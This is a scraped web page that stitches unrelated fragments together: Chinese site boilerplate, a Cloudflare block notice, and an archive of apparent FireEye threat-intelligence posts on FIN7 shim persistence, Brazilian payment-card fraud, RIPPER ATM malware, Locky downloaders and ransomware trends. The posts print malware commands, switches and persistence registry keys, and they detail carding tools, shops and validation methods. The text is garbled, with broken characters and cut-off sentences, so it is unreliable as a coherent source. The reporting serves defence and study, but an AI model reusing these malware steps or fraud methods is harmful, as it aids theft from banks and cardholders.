域名查询:cn域名删除时间
拟删除域名(网址)名单 - domain-history.info豆丁微信公众号
君，已阅读到文档的结尾了呢~~
[精品]语言表达的简明连贯得体之简明篇ppt连贯,得体,语言简明,语言的,连贯ppt,简明,PPT,语言表达,ppt
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
[精品]语言表达的简明连贯得体之简明篇ppt
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='http://www.docin.com/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口Access denied | www.utdallas.edu used Cloudflare to restrict access
Please enable cookies.
What happened?
The owner of this website (www.utdallas.edu) has banned your access based on your browser's signature (59601-ua98).红尘zxc喜欢的音乐 - 歌单 - 网易云音乐
红尘zxc喜欢的音乐
播放：330次
网易云音乐多端下载
同步歌单，随时畅听320k好音乐
网易公司版权所有(C)杭州乐读科技有限公司运营：
违法和不良信息举报电话：6
举报邮箱：Will you be ready?
Archive for the Cyber Crime Category
In 2017, Mandiant responded to multiple incidents we attribute to
FIN7, a financially motivated threat group associated with malicious
operations dating back to 2015. Throughout the various environments,
FIN7 leveraged the CARBANAK backdoor, which this group has used in
previous operations.
A unique aspect of the incidents was how the group installed the
CARBANAK backdoor for persistent access. Mandiant identified that the
group leveraged an application shim database to achieve persistence on
systems in multiple environments. The shim injected a malicious
in-memory patch into the Services Control Manager (&services.exe&)
process, and then spawned a CARBANAK backdoor process.
Mandiant identified that FIN7 also used this technique to install a
payment card harvesting utility for persistent access. This was a
departure from FIN7&s previous approach of installing a malicious
Windows service for process injection and persistent access.
Application Compatibility Shims Background
According to Microsoft, an application compatibility shim is
a small library that transparently intercepts an API (via hooking), , handles the operation itself, or
redirects the operation elsewhere, such as additional code stored on a
system.&Today, shims are mainly used for compatibility purposes for
legacy applications. While shims serve a legitimate purpose, they can
also be used in a malicious manner. Mandiant consultants previously
discussed shim databases at both
Shim Database Registration
There are multiple ways to register a shim database on a system. One
technique is to use the built-in &sdbinst.exe& command line
tool. Figure 1 displays the two registry keys created when a shim is
registered with the &sdbinst.exe& utility.
Figure 1: Shim database registry keys
Once a shim database has been registered on a system, the shim
database file (&.sdb& file extension) will be copied to the
&C:\Windows\AppPatch\Custom& directory for 32-bit shims or
&C:\Windows\AppPatch\Custom\Custom64& directory for 64-bit shims.
Malicious Shim Database Installation
To install and register the malicious shim database on a system,
FIN7 used a custom Base64 encoded PowerShell script, which ran the
&sdbinst.exe& utility to register a custom shim database file
containing a patch onto a system. Figure 2 provides a decoded excerpt
from a recovered FIN7 PowerShell script showing the parameters for
this command.
Figure 2: Excerpt from a FIN7 PowerShell script
to install a custom shim
FIN7 used various naming conventions for the shim database files
that were installed and registered on systems with the &sdbinst.exe&
utility. A common observance was the creation of a shim database file
with a &.tmp& file extension (Figure 3).
Figure 3: Malicious shim database example
Upon registering the custom shim database on a system, a file named
with a random GUID and an &.sdb& extension was written to the 64-bit
shim database default directory, as shown in Figure 4. The registered
shim database file had the same MD5 hash as the file that was
initially created in the &C:\Windows\Temp& directory.
Figure 4: Shim database after registration
In addition, specific registry keys were created that correlated to
the shim database registration.& Figure 5 shows the keys and values
related to this shim installation.
Figure 5: Shim database registry keys
The database description used for the shim database registration,
&Microsoft KB2832077& was interesting because this KB number was not a
published Microsoft Knowledge Base patch. This description (shown in
Figure 6) appeared in the listing of installed programs within the
Windows Control Panel on the compromised system.
Figure 6: Shim database as an installed application
Malicious Shim Database Details
During the investigations, Mandiant observed that FIN7 used a custom
shim database to patch both the 32-bit and 64-bit versions of
&services.exe& with their CARBANAK payload. This occurred when the
&services.exe& process executed at startup. The shim database file
contained shellcode for a first stage loader that obtained an
additional shellcode payload stored in a registry key. The second
stage shellcode launched the CARBANAK DLL (stored in a registry key),
which spawned an instance of Service Host (&svchost.exe&) and injected
itself into that process. &
Figure 7 shows a
database file that was leveraged by FIN7.
Figure 7: Parsed shim database file
For the first stage loader, the patch overwrote the
&ScRegisterTCPEndpoint& function at relative virtual address (RVA)
&0x0001407c& within the services.exe process with the malicious
shellcode from the shim database file.&
The new &ScRegisterTCPEndpoint& function (shellcode) contained a
reference to the path of &\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM&,
which is a registry location where additional malicious shellcode and
the CARBANAK DLL payload was stored on the system.
Figure 8 provides an excerpt of the parsed patch structure within
the recovered shim database file.
Figure 8: Parsed patch structure from the shim
database file
The shellcode stored within the registry path
&HKLM\SOFTWARE\Microsoft\DRM& used the API function
&RtlDecompressBuffer& to decompress the payload. It then slept for
four minutes before calling the CARBANAK DLL payload’s entry point on
the system. Once loaded in memory, it created a new process named
&svchost.exe& that contained the CARBANAK DLL.&
Bringing it Together
Figure 9 provides a high-level overview of a shim database being
leveraged as a persistent mechanism for utilizing an in-memory patch,
injecting shellcode into the 64-bit version of &services.exe&.
Figure 9: Shim database code injection process
Mandiant recommends the following to detect malicious application
shimming in an environment:
Monitor for new shim database files created in the default
shim database directories of &C:\Windows\AppPatch\Custom& and
&C:\Windows\AppPatch\Custom\Custom64&
Monitor for registry
key creation and/or modification events for the keys of
&HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AppCompatFlags\Custom& and
&HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AppCompatFlags\InstalledSDB&
process execution events and command line arguments for malicious
use of the &sdbinst.exe& utility&
FIN7 is a financially-motivated threat group that has been associated
with malicious operations dating back to late 2015. FIN7 is referred
to by many vendors as “Carbanak Group”, although we do not equate all
usage of the CARBANAK backdoor with F…
Introduction
Brazil has been designated a major hub for financially motivated
eCrime threat activity. Brazilian threat actors are targeting domestic
and foreign entities and individuals, with frequent targeting of U.S.
assets. The country routinely places in “Top Five” lists of
various global cyber crime rankings, and multiple sources claim that
financially motivated threat activity in the country has increased
within the past few years.
In this blog we provide insight into the tactics, techniques and
procedures (TTPs) of a Brazilian cyber crime group that specializes in
payment card fraud operations. The threat actors, observed by FireEye
Labs, use a variety of different methods to either compromise or
acquire already compromised payment card credentials, including
sharing or purchasing dumps online, hacking vulnerable merchant
websites and compromising payment card processing devices. Once in
their possession, the actors use these compromised payment card
credentials to generate further card information. The main methods
used by the observed group to launder and monetize illicit funds
include online purchases of various goods and services as well as ATM withdrawals.
Based on extensive observation of this group’s activity, we are able
to characterize their operations lifecycle starting with the initial
followed by the methods used to compromise
credentials or, conversely, purchase already com
then the process of generating new cards for subsequent abuse, which
includes va and finally the subsequent
monetization strategies. Figure 1 depicts this operation workflow.
Figure 1: Brazilian carding operation workflow
Phase 1: Setting Up the Workplace
We observed this group taking several preparatory measures to
maintain anonymity.
The members of the group use a variety of tools, including CCleaner,
on a daily basis to effectively remove any evidence of their
operations. This includes browsing history, temporary files,
Clipboard, typed URLs, cookies, recently opened documents, and
conversations via Skype, Windows Messenger, etc. This almost certainly
limits the potential amount of evidence that law enforcement could
obtain and use against the suspects in the case of an arrest or
property search.
Another common step taken by threat actors is changing their
system’s MAC Address to avoid being uniquely identified. For this
purpose, these actors often use tools such as Technitium MAC Address Changer.
We have observed these actors using Tor or proxy-based tools similar
to Tor (e.g., UltraSurf, as seen in Figure 2). We have also observed
them using virtual private network services that use IPs based in
numerous countries to ensure anonymity and obfuscate criminal operations.
Figure 2: Ultra Surf 12.10
Additionally, many actors conduct transactions using virtual
currencies, most prominently Bitcoin, to anonymize criminal
transactions. Due to the comparative anonymity and lack of government
oversight often associated with the use of virtual currencies, virtual
currency is of significant value for actors involved in illicit
operations when they are performing transactions among themselves.
Phase 2: Data Acquisition
Based on our observations, this group uses a variety of different
methods to either compromise or acquire already compromised payment
card credentials.
Payment card “dumps” are commonly shared amongst Brazilian
threat actors via social media forums such as Facebook, Skype, and
web-based WhatsApp messenger. These social media circles are highly
prevalent amongst these regional actors and are often the preferred
method of communication. This group takes advantage of those
communities to obtain stolen data from peers. Similarly, the group
takes advantage of freely available consolidations of email
credentials, personal information, and other data shared in eCrime
forums for fraud purposes.
The group systematically purchases payment card data via different
online shops. These shops include “Toy Store,” “Joker’s
Stash,” and “Cvv2finder.” The venues, called “dump
shops,” allow customers to use a web-based platform to sort
through thousands or millions of individual pieces of card data and
purchase as much or as little as they want. The shops provide
customers with filters to select the individual pieces of card data
they wish to purchase and add to their carts for checkout, similar to
legitimate sites. The same types of shops also allow malicious actors
to steal credentials stolen from other services such as email
providers, online bill payment websites, entertainment services, or
travel booking websites.
These actors scan websites for vulnerabilities to exploit to
illicitly access databases. They most commonly target Brazilian
merchants, though others use the same tactics to exploit entities
outside Brazil. One simple method the group uses is Google Dorks,
advanced Google searches used to identify security loopholes on
Google-indexed websites. An example is shown in Figure 3.
Figure 3: Example of Portuguese-language Google
Dork used in exploitation
The group also uses the SQL injection (SQLi) tools “Havij
Advanced SQL Injection Tool” and “SQLi Dumper version
7.0” (Figure 4) to scan for and exploit vulnerabilities in
targeted eCommerce sites. Of note, these tools can dump whole
databases from targeted victims.
Figure 4: SQLi Dumper v7.0
This group has also shown interest in modifying point-of-sale (POS)
terminals to harvest magnetic stripe and EMV chip data.
“Toy Store”
FireEye Labs identified “Toy Store”&as one of the card
shops frequently used by the group. It appears that this card shop has
operated since November 2015. Despite the fact that the website has
been taken down multiple times (most recently in July 2016), it keeps
operating, sometimes with newly registered domains.
The store offers a large amount of dumps from multiple sellers. The
sold credentials are associated with payment cards of various types,
issued by variety of financial institutions from multiple countries.
At least eight sellers update the website as frequently as daily,
offering newly obtained databases from the U.S.
Examination of dumps uploaded between May 2016 and July 2016
revealed that one vendor uploaded 1,900 credit cards issued by
Brazilian banks. Further examination shows sellers uploading dumps
regularly from the same locations. In Table 1, seller “X”
uploaded the listed data during the first two weeks of August 2016.
Table 1: Data advertised by one “Toy
Store” vendor
This seller uploads dumps exclusively from either Texas or Florida.
Some base names they provide even contain the word “POS,”
with a validity rate of 90 percent. This suggests that ATM skimming
devices or malware are probably installed in these locations.
The shop allows users to make bulk purchases for any U.S. state,
ranging from packages of 30 to 500 units with prices ranging from $250
to $1,000 per bulk.
Registration is free and the only payment method accepted is
Bitcoin. A unique Bitcoin payment address is generated per user.
Finally, the website has checker functionality & charging $0.50 per
check & that allows users to quickly check for credit card validity
and ask for a refund if a purchased card is not valid (Figure 5).
Figure 5: Toy Store shop site
Phase 3: Generating Further Card Numbers
Once in possession of compromised payment card credentials, these
actors use tools commonly known as “card generators” to
generate new card numbers based on the compromised ones, creating
additional opportunities for monetization. These tools require as
input a valid 16-digit credit card number, expiration date, and a file
name to store the new cards generated. Examples of such tools commonly
used by Brazilian carders include “WZP” (Figure 6) and
“Gerador CC” (Figure 7).
Figure 6: “WZP” card generator
Figure 7: “Gerador CC” card generator
“Gerador CC” generates credit card numbers based on the
Bank Identifier Number (BIN), with a fixed expiration date and CVV
equal to 000. Typically, 1,000 cards will be generated per round. Then
threat actors use public websites set up to check if the credit card
number is valid. However, the fact that the card number generated is
valid does not necessarily mean the card can be used for real
purchases at any website. This method of generating card data cannot
determine what validation information (e.g., expiration date) or
personal information should be associated with the card numbers. So,
to make purchases with the data, actors have to find websites with
vulnerable authentication systems.
Phase 4: Validating New Card Numbers
After stealing, buying, or generating card data, the group validates
it through multiple tools and services available in underground communities.
Vulnerable merchant websites & websites that accept payments with
generated or compromised payment cards & are identified and used
regularly by carders. For example, in March 2016, we observed an
advertisement in an underground community for a list that contained
the addresses of 10,000 vulnerable merchant websites. Criminals take
advantage of these sites to not only make purchases, but also to
bulk-check card data for usability.
One bulk card-checking tool this group uses is “Testador
Amazon.com v1.1” (Figure 8). Despite its name, this tool does not
use Amazon&s website, but exploits an unauthenticated Cross-Site
Request Forgery (CSRF) vulnerability of a merchant website allowing
the abuse of PayPal Payflow link functionality (Figure 9).
Figure 8: Testador Amazon v1.1 GUI
Figure 9: PayPal Payflow Link page
A Payflow Link is a PayPal-hosted payment solution that allows
merchant websites to securely connect their customers to PayPal’s
secure server and use it to automate order acceptance, authorization,
processing, and transaction management, making it useful for carders
to check the validity of credit card numbers. Payflow links cannot be
accessed directly, but only from trusted and authenticated merchants.
“Testador Amazon” abuses legitimate merchant sites to submit
unauthenticated valid orders, providing access to a legacy PayPal
Payflow Link. At this point, actors can test the generated credit card
numbers by filling the input field of the form automatically via the
tool. This tool then continues submitting thousands of valid orders,
simultaneously checking for the validity of the next credit card
number in the list.
The actors use a dedicated IRC channel provided by the eCrime
community service “ChkNet” (Figure 10) to validate credit
cards. Based on our observations of interactions in this channel,
between May 2016 and June 2016, malicious actors validated 2,987 cards
from 62 countries, with the most coming from the U.S. (nearly half),
Brazil, and France. The actors in the channel share instructions on
validation and advice on maintaining anonymity during these
operations. The channel is accessible
actors interested in using the IRC bot to verify the validity of
credit cards are charged 0.003 BTC ($1.88 USD).
Figure 10: ChkNet IRC service activation
Another validation method involves using online charity donations.
ChkNet also provides an API and a software tool named &Checker& that
leverages charity websites for this purpose. This type of exploitation
of charities is popular in the Brazilian eCrime community. Figure 11
shows a credit card tested by Checker. The Status &Live& means the
card was successfully used during an online payment transaction.
Figure 11: Checker credit card validation result
Phase 5: Laundering and Monetization
We observed this group using multiple tactics to monetize the card
data it steals and generates.
The actors frequently use the stolen data to create cloned physical
cards, which they use to attempt to withdraw funds from ATMs. The
group has performed these activities at multiple locations across
Brazil, possibly using multiple mules. The group primarily uses the
MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards.
Figure 12: MSR606 software
Figure 13: MSR606 Magnetic Stripe card reader/writer
Additionally, we observed the group exploiting popular eCommerce
sites to perform fraudulent transactions. This monetization tactic
requires the group to constantly refine its tactics to deal with
measures put in place to validate that card and cardholder data is
legitimate and other anti-fraud checks. Carders in the community with
whom this group interacts regularly share recommendations based on
this experience, such as using virtual private networks, limiting the
number of items purchased at a time, and cleaning machines used to
make purchases of any profiling information such as cookies.
Whether this group uses any further means to launder the proceeds
from these activities is unclear. However, Brazilian actors commonly
use several methods to do so, such as reselling cards they have
created, paying bills with stolen cards in return for a portion of the
bill’s value and reselling illicitly obtained goods.
Payment card fraud has been extremely profitable for malicious
actors for years. Given its profitability and actors’ investment in
this type of fraud, we see no indication of actors moving away from
this type of activity for the foreseeable future. As security measures
continue to evolve to counter this area of fraud, we will likely see
actors attempting to devise new schemes to maintain the profits they
are obtaining and continue capitalizing on their investments in this area.
This material was originally posted to the FireEye iSIGHT
Intelligence MySIGHT Portal on Oct. 7, 2016. The FireEye iSIGHT
Intelligence MySIGHT Portal contains additional information based on
our investigations of a variety of topics discussed in this post,
including Joker&s Stash, ChkNet, virtual currencies, and
point-of-sale systems. Click&
&for more information.
FireEye iSIGHT Intelligence has been tracking a pair of
cybercriminals that we refer to as the &Vendetta Brothers.& This
enterprising duo uses various strategies to compromise point-of-sale
systems, steal payment card information and sell it on
their
underground marketplace &Vendetta World.&
The Vendetta Brothers & who we believe operate from Spain and
Eastern Europe & have been observed using everything from phishing to
installing physical skimmers to steal payment card data, and their
targets have mostly been located in the U.S. and Nordic countries.
Our latest report shines light on the Vendetta Brothers& tactics,
techniques and procedures, which involve the use of practices more
commonly seen
in legitimate business, including outsourcing,
partnerships, diversifying their market, and insulating liability.
We expect to see other cybercriminal groups using these more
advanced techniques as a way of scaling their operations and
increasing profits, all while mitigating risk and potentially
frustrating investigators.
On Aug. 23, 2016, FireEye detected a potentially new ATM malware
sample that used some interesting techniques not seen before. To add
more fuel to an existing fire, the sample was uploaded to VirusTotal
from an IP address in Thailand a couple of minutes before the Bangkok
Post newspaper reported&the theft of 12 million baht from ATMs at
banks in Thailand.
In this blog, FireEye Labs dissects this new ATM malware that we
have dubbed&RIPPER (due to the project name &ATMRIPPER&
identified in the sample) and documents indicators that strongly
suggest this piece of malware is the one used to steal from the ATMs
at banks in Thailand.
Connection to previous ATM Malware
Targets the same ATM brand.
The technique used to
expel currency follows the same strategy (already documented)
performed by the
(Tyupkin),
Similar to SUCEFUL, it is
able to control the Card Reader device to Read or Eject the card on
Can disable the local network interface, similar to
capabilities of the Padpin
Uses the &sdelete& secure deletion tool, similar
to GreenDispenser, to
remove forensic evidence.
Enforces a limit of 40 bank notes
per withdrawal consistently, which is the maximum allowed by the ATM
New features, capabilities, or behaviors in RIPPER
It targets three of the main ATM Vendors worldwide, which is a
RIPPER interacts with the ATM by inserting a specially
manufactured ATM card with an EMV chip that serves as the
authentication mechanism. Although this technique was already used
family, it is an
uncommon mechanism.
Similarities between RIPPER and the recent ATM theft in Thailand
RIPPER analysis
MD5: e5ca0ccb0a042daf2adc13
RIPPER Persistence:
RIPPER can maintain persistence using two modes: either as
standalone service or masquerading as a legitimate ATM process.
RIPPER is installed as a service if called with the following arguments:
service install
Before creating the service, it will kill the process &dbackup.exe&,
which is specific to one common ATM vendor:
cmd /c taskkill /IM dbackup.exe /T /F
Then it will replace the original dbackup.exe binary under
c:\Windows\system32\ (if present) with itself.
Finally it will install a persistent service with following attributes:
RIPPER can delete the &DBackup Service& service if run with the
following arguments:
service remove
RIPPER can stop or start the &DBackup Service& with the following arguments:
&service start& or &service stop&
RIPPER also supports the following command line switches:
/autorun: Will Sleep for 10 minutes and then run in the
background, waiting for interaction.
/install: RIPPER will replace the ATM software running on the
ATM as follows:
Upon execution, RIPPER will kill the processes running in memory for
the three targeted ATM Vendors via the native Windows &taskkill& tool.
RIPPER will examine the contents of directories associated with the
targeted ATM vendors and will replace legitimate executables with
itself. This technique allows the malware to maintain the legitimate
program name to avoid suspicion.
RIPPER will maintain persistence by adding itself to the
\Run\FwLoadPm registry key (that might already exist as part of the
vendor installation), passing the &/autorun& parameter that is
understood by the malware, as seen in Figure 1.
Figure 1: Registry key added for persistency
/uninstall: RIPPER removes the registry keys created
Running without parameters
If RIPPER is executed without any parameters, it will perform the
following actions:
1.&&&& It will connect with the Cash Dispenser, Card Reader and the
Pinpad. Since every ATM brand has its own unique devices names, RIPPER
will identify the current devices installed by enumerating them under
the following registry key:
HKEY_USERS\.DEFAULT\XFS\LOGICAL_SERVICES\
2.&&&& RIPPER will make sure the devices are available by querying
their status (Figure 2), and if not available, will exit.
Figure 2: Querying the devices status via
WFSGetInfo() API
3.&&&& For the Dispenser it will obtain information such as the Cash
Unit details to determine the number and type of available notes.
4.&&&& Finally i the first of which will
monitor the status of the ATM devices to make sure they are available
and will read all the keystrokes received from the Pinpad device
waiting to interact with the thieves (see step 7), as seen in Figure 3.
Figure 3: Monitoring Pinpad keystrokes
5.&&&& The second thread monitors the Card Reader, and once a card
is inserted it validates the EMV chip for authentication to the ATM Malware.
6.&&&& Once a valid card with a malicious EMV chip is detected,
RIPPER will instantiate a timer to allow a thief to control the
machine. Figure 4 depicts the timer function.
Figure 4: Monitoring the Card Reader
7.&&&& Once the thieves start interacting with RIPPER, they enter
instructions via the Pinpad and multiple options are displayed,
including methods for dispensing currency. Figure 5 depicts some of
the options available to the thieves.
a.&&&& CLEAN LOGS: Will clear the log stored at: C:\WINDOWS\temp\clnup.dat
b.&&&& HIDE: Will hide the Malware GUI by calling
ShowWindow() API.
c.&&&&&NETWORK DISABLE: Will shut down the ATM local network
interface to prevent it from communicating with the bank. It can
re-enable the connection if needed.
Figure 5: Main Menu
d.&&&& REBOOT: Will call ExitWindowsEX() API without sending
WM_QUERYENDSESSION message to avoid prompts for confirmation, causing
the system to reboot.&
e.&&&& BACK: Ejects the malicious ATM card back to the
thieves by calling the WFSExecute() with the command:
WFS_CMD_IDC_EJECT_CARD. This option, depicted in Figure 6, was
observed being used by the SUCEFUL family.
Figure 6: Asking Card Reader to eject the chip card
Conclusion
Through open sources, we&ve identified a family of malware that may
have been used in recent ATM robberies and which bears some
similarities to known families of malware. This malware family can be
used to compromise multiple vendor platforms and leverages uncommon
technology to access physical devices. In addition to requiring
technical sophistication, attacks such as that affecting the ATMs in
Thailand require coordination of both the virtual and the physical.
This speaks to the formidable nature of the thieves.
On June 21, 2016, FireEye&s Dynamic Threat Intelligence (DTI)
identified an increase in JavaScript contained within spam emails.
FireEye analysts determined the increase was the result of a new Locky
ransomware spam campaign.
As shown in Figure 1, Locky spam activity was uninterrupted until
June 1, 2016, when it stopped for nearly three weeks. During this
period, Locky was the most dominant ransomware distributed in spam
email. Now, Locky distribution has returned to the level seen during
the first half of 2016.
Figure 1. Locky spam activity in 2016
Figure 2 shows that the majority of Locky spam email detections
between June 21 and June 23 of this year were recorded in Japan, the
United States and South Korea.
Figure 2. Locky spam by country from June 21 to
June 23 of this year
The spam email & a sample shown is shown in Figure 3 & purports to
contain an unpaid invoice in an attached ZIP archive. Instead of an
invoice, the ZIP archive contains a Locky downloader written in JavaScript.
Figure 3. Locky spam email
JavaScript based Downloader Updates
In this campaign, few updates were seen in both the JavaScript based
downloader and the Locky payload.
The JavaScript downloader does the following:
Iterates over an array of URLs hosting the Locky payload.
If a connection to one of the URLs fails, the JavaScript sleeps
for 1,000 ms before continuing to iterate over the array of
Uses a custom XOR-based decryption routine to decrypt
the Locky payload.
Ensures the decrypted binary is of a
predefined size. In Figure 4 below, the size of the decrypted binary
had to be greater than 143,360 bytes and smaller than 153,660 bytes
to be executed.
Figure 4. Payload download function in JavaScript
5.&&&& Checks (Figure 5) that the first two bytes of the binary
contain the &MZ& header signature.
Figure 5: MZ header check
6.&&&& Executes the decrypted payload by passing it the command line
parameter, &123&.
Locky Payload Updates
The Locky ransomware downloaded in this campaign requires a command
line argument to properly execute. This command line parameter, &123&
in the analyzed sample, is passed to the binary by the first stage
JavaScript-based downloader. This command line parameter value is used
in the code unpacking stage of the ransomware. Legitimate binaries
typically verify the number of arguments passed or compare the command
line parameter with the expected value and gracefully exit if the
check fails. However in the case of this Locky ransomware, the program
does not exit (Figure 6) and the value received as a command line
parameter is added to a constant value defined in the binary. The sum
of the constant and the parameter value is used in the decryption
routine (Figure 7). If no command line parameter is passed, it adds
zero to the constant.
Figure 6. Command line parameter check
Figure 7. Decryption routine
If no command line parameter is passed, then the constant for the
decryption routine is incorrect. This results in program crash as the
decrypted code is invalid. In Figure 8 and Figure 9, we can see the
decrypted code sections with and without the command line parameter, respectively.
Figure 8. Correct decrypted code
Figure 9. Incorrect decrypted code
By using this technique, Locky authors have created a dependency on
the first stage downloader for the second stage to be executed
properly. If a second stage payload such as this is directly analyzed,
it will result in a crash.
Conclusion
As of today, the Locky spam campaign is still ongoing, with an added
anti-analysis / sandbox evasion technique. We expect to see additional
Locky spam campaigns and will remain vigilant in order to protect our customers.
Email Hashes
2cdf62f8aae895c769ab3ac59bfa8fc79ca2f326b93a
1fd5c1f0ecc1d54324f3bdc327ea13cbd93caef0a06
0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06
2c32aaf33b20b36d29b9c012b731da4c
198d8d1a7c1f5ebb10f95ffef4850e
UPDATE (June 15, 2016): This post has been updated to include new
data on ransomware activity, which is also now broken down by region.
Cyber extortion for financial gain is typically carried out in one
of two ways. The first method is a business disruption attack & a
category we discussed at length in . In this type of attack, threat actors target an
organization&s critical business systems, capture confidential data
and threaten to do something malicious with that data (such as expose,
delete, or encrypt it) unless a ransom is paid. This method is
generally more targeted, requires a greater deal of finesse on the
part of the threat actors, and often has a greater potential payout.
Ransomware is the other common method of cyber extortion for
financial gain.
is a type of malware that prevents users from interacting with their
files, applications or systems until a ransom is paid, typically in
the form of an anonymous currency such as Bitcoin. While individual
computer and mobile device users have long been targets of ransomware,
the threat has expanded. Ransomware has gained publicity in recent
months through mainstream media coverage of ransomware attacks against
organizations, namely hospitals.
While the end goal is the same & some type of financial payout to
the attacker & not all ransomware operates the same way. The
file-encrypting variety is perhaps the most dangerous. This is because
the targeted files, which often contain users& or organizations& most
valuable data, become useless without the decryption key. The issue is
compounded because paying the ransom offers no guarantee that the
files will be unlocked, thus making frequent backups the best defense
against ransomware.
Since the average ransom demanded from an individual user is
relatively low (typically a few hundred dollars, if that), threat
actors distributing ransomware typically follow the &spray and pray&
tactic of sending out as many lures as possible & emails with
malicious attachments or links to malicious websites, for example & to
maximize their potential gains.
Ransomware Spike in March
Based on data from FireEye Dynamic Threat Intelligence, ransomware
activity has been rising fairly steadily since mid-2015. We observed a
noticeable spike in March 2016. Figure 1 depicts the percentage of
ransomware compared to all malware detected on FireEye products from
October 2015 to May 2016.
Figure 1: Ransomware detections from August 2015 to May 2016
The spike is noteworthy, and consistent with other observations. In
March 2016, FireEye Labs detected a significant
downloaders due to an email spam campaign
targeting users in more than 50 countries. The malicious email
attachments pretended to contain an invoice or a picture, but opening
the attachment led to an infection instead.
Ransomware in the Media
There is no denying the satisfaction an attacker feels when their
exploits make the news. For threat actors distributing ransomware, the
satisfaction is even greater when the headlines report that the victim
paid the ransom. A recent blitz of ransomware reports in the media &
as well as the follow-up success stories & may have spurred other
attackers to get in on the action, possibly resulting in the March
ransomware activity spike. The Petya ransomware, for instance,
includes links to recent media articles on its ransom payment page, as
shown in Figure 1.
Figure 2: FireEye Threat Intelligence in 2016
uncovered Petya ransomware advertising links to recent media
articles on their ransomware payment page
Hollywood Presbyterian Medical Center incident
In early February, Hollywood Presbyterian Medical Center (HPMC) was
in the media spotlight after their systems . Midway through the
month, Allen Stefanek, president and CEO,
that staff had trouble accessing the network beginning Feb. 5. He
explained that malware locked access to certain computer systems and
prevented the sharing of communications electronically, and indicated
that a ransom of 40 Bitcoins had been requested (approximately $17,000
at the time).
&The quickest and most efficient way to restore our systems and
administrative functions was to pay the ransom and obtain the
decryption key,& Stefanek wrote. &In the best interest of restoring
normal operations, we did this.& HPMC restored its electronic medical
record system and cleared all systems of the malware by Feb. 15.
Continued targeting of hospitals
Attackers may have taken a hint that hospitals are a lucrative
target. Later in February,
that file-encrypting ransomware infected the
systems of Lukas Hospital and Klinikum Arnsberg hospital & both in
Germany. Then in March,
that data at Union Memorial Hospital in
Maryland & as well as other MedStar hospitals in the Washington, DC
area & were encrypted by ransomware, and that the requested ransom was
45 Bitcoins, or about $18,500 at the time.
The targeting of hospitals is no surprise. Cyber criminals have been
increasingly turning to industries such as healthcare that possess
critical data but may have limited investment in security across their
enterprise. With hospitals, budget dollars often go towards surgery
wards, emergency care centers and supplies for a large number of
patients & not security. This makes for a tricky issue, since
hospitals cannot operate without the necessary patient data stored in
their systems.
Other Factors Influencing Uptick in Ransomware Activity
High-profile media coverage of ransomware is certainly attracting
attackers, but that is not the only factor driving the uptick in
activity. The following are some additional factors contributing to
the increase:
Relatively high profit margins coupled with the relatively low
overhead required to operate a ransomware campaign have bolstered
the appeal of this particular attack type, fueling market demand for
tools and services corresponding to its propagation. For example, we observed a small-scale ransomware operation that
nevertheless likely netted the perpetrators about $75,000.
The success of prolific ransomware families such as CryptoWall
has provided a blueprint for aspiring ransomware developers,
showcasing increasing profit margins and campaign sustainability.
According to the
(IC3), CryptoWall generated identified
victim losses totaling more than $18 million between April 2014 and
June 2015.
The emergence of several new ransomware variants
adopting a ransomware as a Service (RaaS) framework since mid-2015,
a phenomenon likely driven by the competitive development of quality
goods and services within the cyber crime ecosystem. Based on
multiple factors, RaaS offerings & which are uniquely poised to
capitalize on current underground marketplace demand for ransomware
& are highly likely to fuel an increasing number of ransomware
infections.
Ransomware Variants
Through this discernible uptick in ransomware activity from mid-2015
to early 2016, FireEye has observed significant growth and maturation
of the ransomware threat landscape & predominately involving the
proliferation of myriad new variants.
Prolific Ransomware Families
We continue to observe the sustained distribution of multiple,
well-established ransomware families used in both geographically
targeted and mass infection campaigns. In multiple cases these
renowned variants, such as CryptoWall and TorrentLocker, spawned
updated variants with improvements in either encryption capabilities
or obfuscation techniques. These established ransomware brands will
continue to pose a significant threat to global enterprises, as
malware functionality, encryption techniques and counter-mitigation
measures are adapted and successfully introduced into updated
variants. Examples include:
TorrentLocker: Throughout 2015, FireEye observed continued
distribution of TorrentLocker, a ransomware family based on both
CryptoLocker and CryptoWall. According to multiple open-source
reports, TorrentLocker has been active since at least early 2014 and
is most often distributed in geographically-specific spam
campaigns.
CTB-Locker: CTB-Locker & a name that represents the key
elements of the ransomware, namely Curve (for Elliptic Curve
Cryptography), Tor and Bitcoin & was first seen around mid-2014 and
remained active throughout 2015. During this reporting period, we
observed multiple campaigns propagating CTB-Locker and its variants,
including CTB-Locker distributors capitalizing on Windows 10
releases and free upgrades by .
Novel Ransomware Variants
We have also observed several new ransomware variants that
incorporate a range of new tactics, techniques and procedures (of
varying degrees of technical practicality). Based on the increased
growth in this area, we expect ransomware developers to continue
equipping ransomware variants with novel features in order to expand
targeted platforms and increase conversion ratios.
Chimera: The operators behind the &Chimera ransomware not
only used the malware to encrypt victims& files, but further
threatened to publish the encrypted data if victims failed to pay
the ransom. The threat actors began targeting German-based small and
medium-sized business enterprises around mid-September 2015.
Ransom32: Ransom32, first publicly reported in late December
2015, is purportedly one of the first ransomware variants based
entirely on JavaScript, potentially allowing for cross-operating
system (OS) compatibility and packaging for both Linux and Mac
LowLevel04: According to , operators of LowLevel04 purportedly spread the
ransomware using the unconventional infection mechanism of
exploiting Remote Desktop and Terminal Services.
Linux.Encoder.1: According to , Linux.Encoder.1 debuted in late 2015 as one of the
first ransomware variants targeting Linux web-based servers. While
the encryption capabilities of the earliest variants proved to be
suspect & with multiple reports alleging faults in its predictable
encryption key & the targeting associated with this malware family
represents a deviation from more traditional Windows-based
Outlook and Implications
We expected to see the ransomware threat landscape sustain, if not
exceed, levels observed in 2015 & and so far we have been right. Cyber
extortion has gained significant notoriety, with illicit profits
